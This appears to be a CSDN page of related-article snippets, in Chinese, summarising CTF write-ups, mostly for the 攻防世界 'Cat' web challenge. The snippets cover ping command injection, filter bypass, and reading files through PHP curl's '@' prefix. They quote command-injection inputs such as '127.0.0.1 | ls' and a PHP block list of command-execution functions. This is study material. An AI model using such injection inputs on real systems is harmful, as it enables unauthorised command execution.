来自攻防世界官方WP | darkless师傅版本 题目描述 抓住那只猫 思路 打开页面,有个输入框输入域名,输入baidu.com进行测试 发现无任何回显,输入127.0.0.1进行测试。 发现已经执行成功,执行的是一个ping命令,一开始想的应该是命令拼接执行,但是输入任何有关拼接的字符串都会提示invalid url 说明系统对这些字符串都进行了过...
攻防世界-web-Cat
ST0new的博客
09-08 686
文章目录攻防世界webCat 攻防世界 web Cat 打开一个输入框,输入一些域名没有反应,输入127.0.0.1 后有回显,那么就可以猜想可能是我们输入的命令 和ping 结合,这里就可以试试通过 & ,| 之类的添加一些其他的命令试试是否可以执行。 寻找绕过点 通过输入127.0.0.1 | ls 发现被过滤返回Invalid URL,这里替换成 & 和&&...
攻防世界 cat
whisper_ZH的博客
09-28 969
** 学习知识点 1.当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容 TRUE为禁用 @ 前缀在 CURLOPT_POSTFIELDS 中发送文件。 FALSE为启用,@开头的value会被当做文件上传。 PHP 5.5.0 中...
攻防世界-Cat-(详细操作)做题笔记
qq_43715020的博客
06-24 4878
攻防世界-Cat-(详细操作)做题笔记
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
攻防世界 cat、Confusion1、lottery
weixin_52268949的博客
04-12 383
进入题目是一个类似于买彩票的东西我们先去注册个账号,然后发现可以buy flag,大概理解题目意思,我们要么只能在买彩票的时候让我们中大奖要么只能改变自己的余额,原题目应该使用dirsearch扫描发现git泄露然后使用Githack复原的但是攻防世界这边直接把源码给了我们。django项目下一般有个settings.py文件是设置网站数据库的路径,所以我们去读取settings文件,这里需要注意django项目生成时settings.py会存放在以项目目录下再以项目名称命名的文件夹下面。
Buuctf PHPweb
weixin_51313108的博客
09-07 381
PHPWeb考点WP 考点 PHP回调函数 反序列化代码执行 系统命令执行(find查找文件) 参考连接:PHP命令执行&代码执行 WP 页面读取不到什么信息,抓个包看到传了俩个参数 func,p。猜测可能是function和parameter。 试试一下查看源代码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","
攻防世界web进阶区Cat详解
hxhxhxhxx的博客
08-07 1276
攻防世界web进阶区Cat详解题目详解 题目 但是我们输入一个链接的时候发现没有回显 这是我们访问loli.club的页面 我们输入ip地址,发现有回显 详解 至此,我们猜测是一个代码执行的考点 我们尝试 127.0.0.1||ls 127.0.0.1&&ls 127.0.0.1|ls 均被过滤 我们发现他的url处存在编码,url编码我们进行尝试 发现,url编码为%80时报错, 因为ASCII码的编码范围0-127 %80相当于128 所以推断是由unicode解码失败导致的,
攻防世界misc】CatFlag_攻防世界catflag(1),2024年网络安全开发前景如何
最新发布
2401_83974412的博客
04-16 756
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。2.不过嘛,做完这道题得回头想想,在hex中右侧频繁出现[C [D是什么意思?
攻防世界 | WP】CAT
ethan18的博客
02-14 3893
攻防世界 | WP】CAT解题步骤学习知识URL编码什么是URL编码 解题步骤 学习知识 URL编码 什么是URL编码 url编码是一个编码格式,它和utf-8或者GBK编码的区别是url编码是针对除了字母数字之外的字符进行编码,比如说: ASCII码控制字符:字符范围 00-1F 十六进制(0-31 十进制)和 7F(127 十进制) 非ASCII编码格式字符 ...
攻防世界-get_post
08-24
攻防世界中,"get_post" 是一个题目,要求学习如何使用GET和POST请求来传递参数。在这个题目中,首先让我们使用GET方式传递一个名为a,值为1的变量。我们只需要在URL窗口输入"/?a=1"并回车即可。接下来,又让我们使用POST方式传递一个名为b,值为2的变量。我们可以使用一些工具来执行这个操作,比如Max Hackbar(Hackbar的替代品)。在Max Hackbar中,我们将题目的地址粘贴到第一个窗口中,在下方窗口中输入"b=2",然后点击"Execution"按钮,即可得到flag。此外,我们也可以使用Python编程代码来发送POST请求,准备要提交的数据并发送请求,然后处理响应并打印出来。以上就是攻防世界中关于"get_post"题目的解答方法。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [C#winform工具模拟getpost请求,app防攻击加密源码](https://download.csdn.net/download/xiaogxiao/9638711)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [攻防世界:get_post](https://blog.csdn.net/qq_57061511/article/details/117886323)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [【攻防世界】get_post](https://blog.csdn.net/m0_74979597/article/details/131676045)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值